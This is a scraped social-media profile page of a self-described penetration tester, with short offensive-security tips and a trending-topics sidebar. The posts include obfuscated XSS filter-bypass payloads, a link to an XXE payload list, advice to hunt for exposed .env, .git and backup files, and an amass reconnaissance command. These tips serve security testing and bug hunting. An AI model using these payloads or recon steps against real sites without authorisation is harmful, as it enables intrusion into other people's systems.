Dark@Joker:~$
@ExploitNest
CRTA | CAP | OSCP (Aspirant) - Pentration Tester & Bug Hunter - Red Teamer 🤡
Nobody can memorize all XXE payloads/vectors. Use this payload list when testing for XXE vulnerabilities: github.com/payloadbox/xxe…
location-based WAF bypass techniques Tag Blending: <Svg OnLoad= location=textContent>JavaS<a>cript:al<a>ert(<a>1)// Template Literals: <Svg OnLoad= location=`Java${/S/.source}cript:alert${"\50"}1)`> Credit - @BRuteLogic
📂 Target: robots.txt + sitemap.xml 👀 What to look for: /admin_old/ /staging/ /backup/ Hidden API routes .env, .git, .bak files 🎯 Use found paths in: Fuzzing Bruteforce Hidden login discovery
Ultimate Reconnaissance + Port Mapping Methodology (Advanced) 1. Enumerate all the domains+subdomains `$ amass enum -ip -d <domain>` 2. Extract the hosts from the Amass file, to create a file named hosts-amass.txt. `$ cat amass_output/amass.txt | cut -d']' -f 2 | awk…
![TheMsterDoctor1's tweet image. Ultimate Reconnaissance + Port Mapping Methodology (Advanced)
1. Enumerate all the domains+subdomains
`$ amass enum -ip -d &lt;domain&gt;`
2. Extract the hosts from the Amass file, to create a file named hosts-amass.txt.
`$ cat amass_output/amass.txt | cut -d']' -f 2 | awk…](https://pbs.twimg.com/media/GoUWKW3XgAAtFWw.jpg)
United States الاتجاهات
- 1. Good Thursday 20.6K posts
- 2. Wemby 112K posts
- 3. Happy Friday Eve N/A
- 4. Talus Labs 16.4K posts
- 5. Spurs 59.2K posts
- 6. #Wordle1587 N/A
- 7. jeonghan 163K posts
- 8. Domain For Sale 32.8K posts
- 9. #MakeOffer 32.3K posts
- 10. Mavs 20.4K posts
- 11. Clippers 12.4K posts
- 12. Fetterman 40.5K posts
- 13. Cooper Flagg 14.6K posts
- 14. Victor Wembanyama 42.1K posts
- 15. #QueenRadio 24.6K posts
- 16. Satoshi 18.6K posts
- 17. Maxey 13.2K posts
- 18. Anthony Davis 8,824 posts
- 19. VJ Edgecombe 29.6K posts
- 20. LaVine 1,586 posts
Something went wrong.
Something went wrong.